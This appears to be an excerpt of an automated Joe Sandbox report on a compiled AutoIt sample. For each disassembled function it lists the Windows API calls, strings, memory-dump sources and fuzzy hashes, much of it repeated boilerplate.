                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                        • String ID: (
                                                                                        • API String ID: 2598888154-3887548279
                                                                                        • Opcode ID: 0baee9148f5f95ccb095a3febd7fc936840aef9dcb876ce248c2cf5678a2a8dc
                                                                                        • Instruction ID: 873deb0bdd160bd9dee3afbc7759941d768961ffb15910a66cbf42eb69699149
                                                                                        • Opcode Fuzzy Hash: 0baee9148f5f95ccb095a3febd7fc936840aef9dcb876ce248c2cf5678a2a8dc
                                                                                        • Instruction Fuzzy Hash: 4A514D75A04309EFDB14CFA8CC85EAEBBB9EF48720F14841DF95997210C7B5A941DB60
                                                                                        Function 00F2CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2889450990-2391861430
                                                                                        • Opcode ID: 0c86cd1e88c0e121b029b3d6a4b879944efa8bcc8f852c5c7c7ffd5e9f5e59a1
                                                                                        • Instruction ID: aacad3e7598e2e77d58345366b5bc1aa38a9eeee9729dccb75bcf28858d661e0
                                                                                        • Opcode Fuzzy Hash: 0c86cd1e88c0e121b029b3d6a4b879944efa8bcc8f852c5c7c7ffd5e9f5e59a1
                                                                                        • Instruction Fuzzy Hash: 2351CD7280055DBACF14EBE1DD42EEEB7B8AF04304F104066F505720A2EB706F59EBA1
                                                                                        Function 00F2CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2889450990-3420473620
                                                                                        • Opcode ID: 2ab6fa1e02c9fd33997dbb6e6f06d894946b2f04ca8ee8fbaf499032c51a21db
                                                                                        • Instruction ID: 5c129be03ad96afd2d46a4300adf633829d4ebd6921b62be9333169bfe850b4e
                                                                                        • Opcode Fuzzy Hash: 2ab6fa1e02c9fd33997dbb6e6f06d894946b2f04ca8ee8fbaf499032c51a21db
                                                                                        • Instruction Fuzzy Hash: C351BE7280065DAADF15EBE0DD42EEEB7B8AF04344F104065F509720A2EB746F59EBA1
                                                                                        Function 00F255BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F255D7
                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F25664
                                                                                        • GetMenuItemCount.USER32(00FA1708), ref: 00F256ED
                                                                                        • DeleteMenu.USER32(00FA1708,00000005,00000000,000000F5,?,?), ref: 00F2577D
                                                                                        • DeleteMenu.USER32(00FA1708,00000004,00000000), ref: 00F25785
                                                                                        • DeleteMenu.USER32(00FA1708,00000006,00000000), ref: 00F2578D
                                                                                        • DeleteMenu.USER32(00FA1708,00000003,00000000), ref: 00F25795
                                                                                        • GetMenuItemCount.USER32(00FA1708), ref: 00F2579D
                                                                                        • SetMenuItemInfoW.USER32(00FA1708,00000004,00000000,00000030), ref: 00F257D3
                                                                                        • GetCursorPos.USER32(?), ref: 00F257DD
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00F257E6
                                                                                        • TrackPopupMenuEx.USER32(00FA1708,00000000,?,00000000,00000000,00000000), ref: 00F257F9
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F25805
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3993528054-0
                                                                                        • Opcode ID: 7209b654fc603654e5a191b2077cd79e4c53702b3ab107e3b15622cf3f530370
                                                                                        • Instruction ID: 4c0866c3c70dce34cdffe81c1ce6fea8dfb86589e1bf5d01d50cf744aa8e09a8
                                                                                        • Opcode Fuzzy Hash: 7209b654fc603654e5a191b2077cd79e4c53702b3ab107e3b15622cf3f530370
                                                                                        • Instruction Fuzzy Hash: 11711571A41629BFEB209F54EC49FAABF65FF00B64F244205F5296A1E0C7B16C10FB91
                                                                                        Function 00F1A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F1A1DC
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F1A211
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F1A22D
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F1A249
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F1A273
                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F1A29B
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F1A2A6
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F1A2AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 1687751970-22481851
                                                                                        • Opcode ID: 89a71e2139060f75c5c0f1dee7b90d454f5a17c14a865f9031b4011f22861877
                                                                                        • Instruction ID: 41f4cb3be3bf9b84e968e4a3ec9d6844921e1f7ac2cced04e0c08b263fd6f9e9
                                                                                        • Opcode Fuzzy Hash: 89a71e2139060f75c5c0f1dee7b90d454f5a17c14a865f9031b4011f22861877
                                                                                        • Instruction Fuzzy Hash: 8F410676C1126DABDF11EBA5DC85DEDB7B8BF18350F00406AE911B3160EB709E45DB90
                                                                                        Function 00F43C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 3964851224-909552448
                                                                                        • Opcode ID: ae4cf8867aaf3dc0329e1248736e285a3e356406b9ceecae8825bc0bc96ad332
                                                                                        • Instruction ID: ff825206e7cb478a20b6faba1165dc505d4fdf43276ad5f83f5f0494cd5d5950
                                                                                        • Opcode Fuzzy Hash: ae4cf8867aaf3dc0329e1248736e285a3e356406b9ceecae8825bc0bc96ad332
                                                                                        • Instruction Fuzzy Hash: F541823090028D8BEF14EF54D851AEB37B5AF62350F111824FC552B2A2EB70BE0BEB10
                                                                                        Function 00F225B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F536F4,00000010,?,Bad directive syntax error,00F7DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F225D6
                                                                                        • LoadStringW.USER32(00000000,?,00F536F4,00000010), ref: 00F225DD
                                                                                        • _wprintf.LIBCMT ref: 00F22610
                                                                                        • __swprintf.LIBCMT ref: 00F22632
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F226A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 1080873982-4153970271
                                                                                        • Opcode ID: a9325bf3f518946b6ffe8051437c50c5f26dd48b4ac924cb91e139070e00a627
                                                                                        • Instruction ID: 9b6812258ceb1e472c243f19b5841d05ae5392ff8b0d3c3c4927f458dd2a1c6f
                                                                                        • Opcode Fuzzy Hash: a9325bf3f518946b6ffe8051437c50c5f26dd48b4ac924cb91e139070e00a627
                                                                                        • Instruction Fuzzy Hash: DA216D3290025EBFDF11AF90CC4AEEE7B79BF18304F044455F515760A2EB71A619EB51
                                                                                        Function 00F27AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F27B42
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F27B58
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F27B69
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F27B7B
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F27B8C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 890592661-1007645807
                                                                                        • Opcode ID: 3899a1f55aa606eff71eae9f783ee9f535df346b432bbf24ea8a169d4fcb4b79
                                                                                        • Instruction ID: 0d47bd6b7b4c8d06f70f37efb947cdc2e8f34928c15f8d0316d7f5363bf32b65
                                                                                        • Opcode Fuzzy Hash: 3899a1f55aa606eff71eae9f783ee9f535df346b432bbf24ea8a169d4fcb4b79
                                                                                        • Instruction Fuzzy Hash: 6211C8B1A442AD79EB20B3A2DC4ADFFBABCEBD1B10F0004157411B20C1DA605E45D6B3
                                                                                        Function 00F2778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00F27794
                                                                                          • Part of subcall function 00EFDC38: timeGetTime.WINMM(?,7694B400,00F558AB), ref: 00EFDC3C
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00F277C0
                                                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00F277E4
                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00F27806
                                                                                        • SetActiveWindow.USER32 ref: 00F27825
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F27833
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F27852
                                                                                        • Sleep.KERNEL32(000000FA), ref: 00F2785D
                                                                                        • IsWindow.USER32 ref: 00F27869
                                                                                        • EndDialog.USER32(00000000), ref: 00F2787A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1194449130-3405671355
                                                                                        • Opcode ID: d37935980eca351c1208705dccf5fe9e0e020fdddfc1d27ff1e56669f723c453
                                                                                        • Instruction ID: b3d7c8d5b9856156ba77644e74abbf9db35423e2df3eb2c24f36a8e165c23a5d
                                                                                        • Opcode Fuzzy Hash: d37935980eca351c1208705dccf5fe9e0e020fdddfc1d27ff1e56669f723c453
                                                                                        • Instruction Fuzzy Hash: 27215CB0B0831DAFEB056B61FC89B66BF69FB46758F140124F51782162CBB29D10FB21
                                                                                        Function 00F302EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • CoInitialize.OLE32(00000000), ref: 00F3034B
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F303DE
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00F303F2
                                                                                        • CoCreateInstance.OLE32(00F6DA8C,00000000,00000001,00F93CF8,?), ref: 00F3043E
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F304AD
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00F30505
                                                                                        • _memset.LIBCMT ref: 00F30542
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00F3057E
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F305A1
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00F305A8
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F305DF
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00F305E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        • Opcode ID: 0e227c0f315010fcdfc7ec2651832a82e69a0b3bb70881245675fc29978e5cdd
                                                                                        • Instruction ID: cddcadf29881b41012b75f026a6ab3072efb2f85465027db457b94277a933cbe
                                                                                        • Opcode Fuzzy Hash: 0e227c0f315010fcdfc7ec2651832a82e69a0b3bb70881245675fc29978e5cdd
                                                                                        • Instruction Fuzzy Hash: EDB1E775A00219AFDB04DFA4C898DAEBBF9FF48314F148469E909EB251DB70ED41DB50
                                                                                        Function 00F22E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00F22ED6
                                                                                        • SetKeyboardState.USER32(?), ref: 00F22F41
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00F22F61
                                                                                        • GetKeyState.USER32(000000A0), ref: 00F22F78
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00F22FA7
                                                                                        • GetKeyState.USER32(000000A1), ref: 00F22FB8
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00F22FE4
                                                                                        • GetKeyState.USER32(00000011), ref: 00F22FF2
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00F2301B
                                                                                        • GetKeyState.USER32(00000012), ref: 00F23029
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00F23052
                                                                                        • GetKeyState.USER32(0000005B), ref: 00F23060
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 2c0a8a0b1453aa49bc6b31b813dd179002199e0e11437367ee457e49adb0845a
                                                                                        • Instruction ID: d77ddde7e7918acddbf1bc6af93aa5b624d3958c2c510718fcdd57d2a44ce7e2
                                                                                        • Opcode Fuzzy Hash: 2c0a8a0b1453aa49bc6b31b813dd179002199e0e11437367ee457e49adb0845a
                                                                                        • Instruction Fuzzy Hash: 48513A60E047E839FB35DBA4A8107EEBFF45F11354F08459DC5C24A1C2DA989B4CEB62
                                                                                        Function 00F1ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00F1ED1E
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F1ED30
                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F1ED8E
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00F1ED99
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F1EDAB
                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F1EE01
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00F1EE0F
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F1EE20
                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F1EE63
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00F1EE71
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F1EE8E
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00F1EE9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        • Opcode ID: 9d306f8aee2cf7d351611c373401b6a4f56c506e478dad2c9900970dd3aee0d1
                                                                                        • Instruction ID: d81217cb72f86469de49c6b169e4fbd4ad97fc155f92e8d536ca08484a371d5e
                                                                                        • Opcode Fuzzy Hash: 9d306f8aee2cf7d351611c373401b6a4f56c506e478dad2c9900970dd3aee0d1
                                                                                        • Instruction Fuzzy Hash: BC513271F00209AFDB18CF69DD95AAEBBBAFB88710F14812DF919D7290D7B19D409B10
                                                                                        Function 00EFB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EFB759,?,00000000,?,?,?,?,00EFB72B,00000000,?), ref: 00EFBA58
                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00EFB72B), ref: 00EFB7F6
                                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00EFB72B,00000000,?,?,00EFB2EF,?,?), ref: 00EFB88D
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00F5D8A6
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EFB72B,00000000,?,?,00EFB2EF,?,?), ref: 00F5D8D7
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EFB72B,00000000,?,?,00EFB2EF,?,?), ref: 00F5D8EE
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EFB72B,00000000,?,?,00EFB2EF,?,?), ref: 00F5D90A
                                                                                        • DeleteObject.GDI32(00000000), ref: 00F5D91C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
